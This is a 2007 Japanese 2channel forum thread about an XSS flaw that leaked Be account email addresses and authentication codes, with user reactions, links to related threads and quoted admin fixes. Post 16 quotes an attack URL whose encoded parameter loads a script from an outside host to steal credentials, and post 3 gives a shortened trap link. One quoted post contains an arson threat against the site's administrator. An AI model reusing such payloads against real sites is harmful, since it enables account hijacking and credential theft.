2chにBeのメアドと認証コードが漏れるXSS脆弱性が発見されたらしい

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
詳しくは乳速で

【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見
http://news23.2ch.net/test/read.cgi/news/1196173345/
2名無しさん@お腹いっぱい。:2007/11/27(火) 23:47:09 ID:Tldueh9I BE:1236399168-2BP(5600)
それを承知で俺をPLTにして下さい><

命がけでクソスレを立てます!
3名無しさん@お腹いっぱい。:2007/11/28(水) 00:01:59 ID:ZaHA5XaI BE:203028454-PLT(13210)
IEユーザーはクッキーを削除して、落ち着くまではログインしない方がいいかもね
****http://z.la/ms0k2
↑これを踏むとやばいです
4名無しさん@お腹いっぱい。:2007/11/28(水) 00:08:13 ID:6XTNUK4s BE:1131115076-2BP(8200)
          _,,,,,         ―― |_| |_| >
         /川川ハ        | l ̄ | |    ノ   メ
        ///川川lト、      |_| 匚. |   \   シ
       (ゞ川从川/_,―' ̄ヽ    | |   ノ    食
     __>ームヾ ̄(  _-、 |  |_|   \   っ
    /   |       y-  ノ_|       <   て
    '-,,_ |        |  ムkノ) l_ll_l ,-,    )  る
       "|        |       // /   場
        |         |     匚/   ̄ヽ   合
       |     ___ |              ノ   じ
       r―――"    ‐|  \\     \   ゃ
       |          /     \\   <   ね
       人     乂  /       \\ ノ   え
ニヽ   /  |    ヾ /    ___―― ̄    っ
__\ /  /|     l         ̄ ̄―――__  !
     / /  \\  ヾ                 ν、
 ̄弋二/ ̄|   \\  \   \\            V⌒
 ̄ ̄\\\ ̄\  \\  \    \\
 ̄ ̄ ̄\\\ ̄|   "―_从从     \\
 ̄ ̄ ̄ ̄\\\ ̄\    |   ζ      \\
 ̄ ̄ ̄ ̄ ̄\\\ ̄|    ヾ  \\       \\
 ̄ ̄ ̄ ̄ ̄ ̄\\\\ ̄フ \\ \\
5ギコ猫( ゚Д゚)さん ◆U26057WR46 :2007/11/28(水) 00:11:19 ID:r7t6J8nn BE:594604883-2BP(3377)
危険なのでNGワードに放り込んでおいたよ
6名無しさん@お腹いっぱい。:2007/11/28(水) 00:43:55 ID:wQgwZpag BE:988406249-2BP(6377)
ひどいね、これは
7∬^〜^∬ID:He+n/v090 ◆PITBox8Pc2 :2007/11/28(水) 00:47:47 ID:Wf9euZYA BE:982444649-2BP(6164)
怖いよう;;;
8名無しさん@お腹いっぱい。:2007/11/28(水) 00:49:39 ID:tMcjNwKb BE:446841582-PLT(18181)
踏んでしまったwww
あばばばば^q^
9名無しさん@お腹いっぱい。:2007/11/28(水) 00:50:10 ID:gTPt/Y4Z
>>3
直リンこわいです。><
10名無しさん@お腹いっぱい。:2007/11/28(水) 00:50:55 ID:NGw2eJ/N BE:1021646467-S★(1052173)
怖い
11名無しさん@お腹いっぱい。:2007/11/28(水) 01:02:00 ID:tMcjNwKb BE:1508090696-PLT(18181)
やべwwwwww焼かれたwww
吊ってくる
12名無しさん@お腹いっぱい。:2007/11/28(水) 01:02:40 ID:aRUu4aBs BE:655942346-PLT(71072)
やかれたorz
吊ってくる
13名無しさん@お腹いっぱい。:2007/11/28(水) 01:06:13 ID:O8uuQnZF BE:35256522-PLT(20385)
【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/135

対応された模様。
14名無しさん@お腹いっぱい。:2007/11/28(水) 01:12:24 ID:O8uuQnZF BE:176280454-PLT(20385)
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/218

と思ったら、新しいのが。
15名無しさん@お腹いっぱい。:2007/11/28(水) 01:19:02 ID:PP17toUr BE:497685492-2BP(100)
どれどれ
16名無しさん@お腹いっぱい。:2007/11/28(水) 01:19:46 ID:jy6iGHMv BE:415431353-2BP(3471)
●ニュース速報
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見
http://news23.2ch.net/test/read.cgi/news/1196173345/

●ニュース速報(VIP)
Be鯖バグ踏んだ奴ちょっとこい、修正されんぞ
http://yutori.2ch.net/test/read.cgi/news4vip/1196179999/

●2ch運用情報
【速報】Beのメアドと認証コードが漏れるXSS脆弱性を発見
http://qb5.2ch.net/test/read.cgi/operate/1196177188/

【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/218
218 : 40歳無職(三重県):2007/11/28(水) 01:09:11 ID:uuFnxPaY0

対策されてしまった。
と言う訳で第二弾。

http://z.la/t4b0m (短縮URL)
http://qb6.2ch.net/_boo80/boo80.swx?boo80=%3Cscript%20src%3D%22http%3A%2F%2Fmoyashi%2Esosite%2Ejp%2Fxss%2Fload%2Ejs%22%3E%3C%2Fscript%3E

鱈子は修正頑張ってください。
17名無しさん@お腹いっぱい。:2007/11/28(水) 01:25:04 ID:gTPt/Y4Z
>>16
専ブラにポップアップ付いてるので、
直リンこわいです。><
18名無しさん@お腹いっぱい。:2007/11/28(水) 01:30:03 ID:kT7Iq0Ei BE:172955232-2BP(259)
皆さんのおかげで やっと少し増えたところなのに
焼かれちゃったりしたら、人間不信になるかもでつ。

当分はどのURLも踏まないようにしたいと思います。
嫌な世の中でつね。
19名無しさん@お腹いっぱい。:2007/11/28(水) 01:34:11 ID:T4LMZ28e BE:910041449-DIA(171000)
怖い
20 ◆Nullpo/BU. :2007/11/28(水) 01:47:24 ID:NPfWeA+o BE:193194735-PLT(34443) 株優プチ(be)
こえぇぇぇ
21名無しさん@お腹いっぱい。:2007/11/28(水) 02:15:28 ID:4cJM7E/7 BE:595750346-2BP(2919)
これは法的には問題ないのだろうが、よく考えたねえ。
22名無しさん@お腹いっぱい。:2007/11/28(水) 02:18:16 ID:kmqrbrwo BE:499755029-BRZ(10056)
ふんじゃった
23名無しさん@お腹いっぱい。:2007/11/28(水) 02:20:59 ID:kT7Iq0Ei BE:231475924-2BP(0)
全く別のパソにテケトーなフリメ取って登録してみた
こっちで踏んだらおけ?
24オッサン ◆1.Fuck.nn. :2007/11/28(水) 02:57:43 ID:mKUazTph
★複数板BEのメアドと認証コードが漏れるURLを張る人報告スレ
http://qb5.2ch.net/test/read.cgi/sec2chd/1196184490/
25名無しさん@お腹いっぱい。:2007/11/28(水) 04:38:23 ID:jy6iGHMv BE:969339375-2BP(3471)
>>17
ごめん専ブラ利用者のことまで頭が回らなかった。申し訳ない。
ちなみに、ニュー速で晒されたURIについては
URI文字列で書き込み禁止措置が取られた模様。

●ニュース速報
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その3★
http://news23.2ch.net/test/read.cgi/news/1196182094/
26名無しさん@お腹いっぱい。:2007/11/28(水) 04:59:14 ID:jy6iGHMv BE:387736627-2BP(3471)
●運用情報
Be-2ちゃんねる 人柱募集中。。。Part6
http://qb5.2ch.net/test/read.cgi/operate/1188056382/
http://qb5.2ch.net/test/read.cgi/operate/1188056382/57
#57 : [―{}@{}@{}-] たまご ◆EGGMAN.XJI :2007/09/03(月) 00:25:11 ID:UHhgNS9A0 ?S★(577791)
#クッキー使ってbeの認証コードとメアド盗めるよー(^o^)ノ
#株の操作し放題だろうがたぶんつまらんからやめとく

【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/
http://qb5.2ch.net/test/read.cgi/operate/1196072109/441
#441 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 02:37:17 ID:8igj5YIL0
#そうなんだよね。俺が一昨日ぐらいに見つけて、たまごに言ったら
#それ夏頃にkusaiと自分が見つけたと言われて、XSSが発生する場所も一致した。
#んで黙ってるのはつまらないと思ったので全壊に頼んで立てて貰ったという訳。

http://qb5.2ch.net/test/read.cgi/operate/1196072109/446
#446 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 02:40:39 ID:8igj5YIL0
#>>443
#ニュー速の方にも書いたけど
#タラコと何回かメールでやり取りしたよ
#ただ向こうが聞く耳を持たなかった それだけ

2chの動作報告はここで。 パート22
http://qb5.2ch.net/test/read.cgi/operate/1182679645/
http://qb5.2ch.net/test/read.cgi/operate/1182679645/529-590
27名無しさん@お腹いっぱい。:2007/11/28(水) 05:10:31 ID:ywxetRSt BE:651765964-PLT(21322)
507 ひろゆき@どうやら管理人 ★ 2007/11/28(水) 04:37:34 ID:???0 BE:227366-S★(1012558)
http://be.2ch.net/test/editprof.php
パスワードを変えられるようにしましたー。

511 ひろゆき@どうやら管理人 ★ 2007/11/28(水) 04:39:30 ID:???0 BE:227849-S★(1012558)
passが変わると認証コードも変わりますよ。。と。


【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/
28名無しさん@お腹いっぱい。:2007/11/28(水) 05:35:06 ID:TX00CzgI BE:17673825-2BP(1747)
焼かれた
29名無しさん@お腹いっぱい。:2007/11/28(水) 05:39:54 ID:IMSQGU8q BE:1288937669-2BP(7890)
認証コードはどこで?
30名無しさん@お腹いっぱい。:2007/11/28(水) 07:04:22 ID:tMcjNwKb BE:279276825-PLT(18282)
焼かれてなかったwww
31名無しさん@お腹いっぱい。:2007/11/28(水) 10:45:49 ID:8IkmAWXO BE:382633627-PLT(71072)
焼かれてなかった
よかったよかった
32名無しさん@お腹いっぱい。:2007/11/28(水) 12:17:43 ID:jy6iGHMv BE:332345726-2BP(3471)
●ニュース速報
beのパスワードと認証コードが変えられるようになりました
http://news23.2ch.net/test/read.cgi/news/1196192699/
33名無しさん@お腹いっぱい。:2007/11/28(水) 13:10:00 ID:dPzoqWYU BE:554734073-DIA(110721)
罠URL踏んでメアドと認証コード漏れる→VIPで使われてあっという間に0ポイントに
怖いですね
34名無しさん@お腹いっぱい。:2007/11/28(水) 13:40:19 ID:jy6iGHMv BE:1550942887-2BP(3471)
>>21
いいえ、不正アクセスで真っ黒くなるんじゃないでしょうか?
サイバーノーガード戦法。

【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/
http://qb5.2ch.net/test/read.cgi/operate/1196072109/874
#874 :フェンリル:2007/11/28(水) 12:06:06 ID:KySiAldO0
#マジでひろゆき28万ポイント返しやがれ糞が
#訴えるぞガチで。
#つうか俺のbeにログインしてスレ立てした奴も本気で訴えるわ
#てめーがニュー速に糞スレ立てたせーでsakuられただろーが屑


#2ch閉鎖の危機に追い込むぞ、もしくは管理人の家に火付けにいくわ

#それが嫌なら今週中にポイント戻せよ。

http://qb5.2ch.net/test/read.cgi/operate/1196072109/876
#876 :ひろゆき@どうやら管理人 ★:2007/11/28(水) 12:15:55 ID:???0 ?S★(1013000)
#>つうか俺のbeにログインしてスレ立てした奴も本気で訴えるわ
#訴訟の結果、本人じゃないというのがわかったら、
#戻しますよ。
35名無しさん@お腹いっぱい。:2007/11/28(水) 13:42:01 ID:ElFEw5uP BE:357533472-2BP(1513)
ここには書き込める、ニュー速にもテスト書き込みできた、
でも常駐板では「焼かれたBeでは書き込めません」・・・

そろそろ次スレ立てなきゃならんのにorz
36名無しさん@お腹いっぱい。:2007/11/28(水) 13:46:01 ID:jy6iGHMv BE:1163207467-2BP(3471)
>>34
ちん毛にモヤシ混ざってた
http://news23.2ch.net/test/read.cgi/news/1196205336/
1 : ミトコンドリア(北海道):2007/11/28(水) 08:15:36 ID:hK3VnU3r0 ?DIA(298854) ポイント特典

ちんちん シュッ! シュッ! シュッ!
http://news23.2ch.net/test/read.cgi/news/1196206144/
1 : 女性の全代表(北海道):2007/11/28(水) 08:29:04 ID:qxCULkeS0 ?DIA(298704) ポイント特典

↓ ↓ ↓ ↓

http://be.2ch.net/test/p.php?i=543898837
http://be.2ch.net/test/p.php?i=1087796467
フェンリル◆be/xFEN/R. ★
beポイント:1
登録日:2007-07-02
37名無しさん@お腹いっぱい。:2007/11/28(水) 14:09:38 ID:jy6iGHMv BE:1550943078-2BP(3471)
【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/826
826 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 09:12:15 ID:64fnJpBb0
手順は
1
> http://be.2ch.net/test/editprof.php
> まず、パスワードを変更してください。

2
> んで、再ログイン

・Webブラウザはこれで完了

3
宣撫らに使う新認証コードはWebブラウザのクッキーを見るか
http://be.2ch.net/test/regist.html
でメアド+新パス入力して送ってもらう

でおkかな?
38名無しさん@お腹いっぱい。:2007/11/28(水) 16:33:15 ID:vp5YSCkx BE:380484364-DIA(210000)
なにこれーほんとかどうだか試しちゃう?
39名無しさん@お腹いっぱい。:2007/11/28(水) 17:23:58 ID:tMcjNwKb BE:1563946087-PLT(18422)
やめとけwww
40名無しさん@お腹いっぱい。:2007/11/28(水) 17:48:18 ID:04BeT9XF BE:1070928858-PLT(31001)
焼かれたってのは判別の仕方わからないなぁ
親切心につけこむ感じで嫌なやり方だったね
41名無しさん@お腹いっぱい。:2007/11/29(木) 04:50:28 ID:hwz0QRVt BE:332345726-2BP(3471)
●運用情報
【速報】Beのメアドと認証コードが漏れるXSS脆弱性を発見
http://qb5.2ch.net/test/read.cgi/operate/1196177188/
【news】ニュース速報運用情報43【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196240580/
【news】ニュース速報運用情報42【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196072109/

●セキュリティ
[バグ 仕様]2chの脆弱性について語る[2ちゃんねる]
http://pc11.2ch.net/test/read.cgi/sec/1173113358/
42名無しさん@お腹いっぱい。:2007/11/29(木) 14:04:40 ID:hwz0QRVt BE:332345434-2BP(3535)
●ニュース速報
beのパスワードと認証コードが変えられるようになりました 2
http://news23.2ch.net/test/read.cgi/news/1196238999/
43 ◆KOIHIMEHUc :2008/06/07(土) 16:49:34 ID:VogNyRyf BE:773805964-PLT(63460)
怖い
44名無しさん@お腹いっぱい。:2008/11/03(月) 01:19:41 ID:3Cgq4r6T BE:1589774459-2BP(1713)
45たまんさ(っ´ω`)っ ◆Mist...DME :2008/12/09(火) 22:09:44 ID:i9MXxLax BE:292872342-2BP(7800)
ほうほう
46名無しさん@お腹いっぱい。:2008/12/10(水) 16:26:42 ID:go2Qikh7 BE:921987656-2BP(2369)
ほぅ
47名無しさん@お腹いっぱい。:2009/01/06(火) 00:21:17 ID:GC6YhIW1 BE:328691243-PLT(41666)
ほぅ
48名無しさん@ログイン中:2009/10/07(水) 20:47:08 ID:NkPMykjt BE:336138023-2BP(0)
てす
49名無しさん@ログイン中:2009/10/07(水) 20:49:03 ID:NkPMykjt BE:1120458645-2BP(10)
てす
50名無しさん@ログイン中:2009/10/19(月) 20:41:10 ID:7ZZfmQs/ BE:605220375-2BP(1001)
test
51名無しさん@ログイン中:2009/10/19(月) 20:49:09 ID:7ZZfmQs/ BE:553344184-2BP(6001)
test
52名無しさん@ログイン中:2009/12/22(火) 02:26:04 ID:hM2C1Q7B BE:2302287168-DIA(147072)
お陰さまでIDカブルことが最近頻発してるよ
対処よろしく
53名無しさん@ログイン中:2009/12/27(日) 16:55:50 ID:N/KHrPtb BE:3620635597-2BP(7900)
同じ板だとたまにIDが被る事はあるよね
54名無しさん@ログイン中:2010/01/14(木) 00:45:39 ID:Tlcst3x1 BE:3062076269-PLT(16250)
あうあー
55名無しさん@ログイン中:2010/01/21(木) 05:20:00 ID:X55S7cgT BE:345840342-PLT(20972)
あうあう
56名無しさん@ログイン中
あうあうあー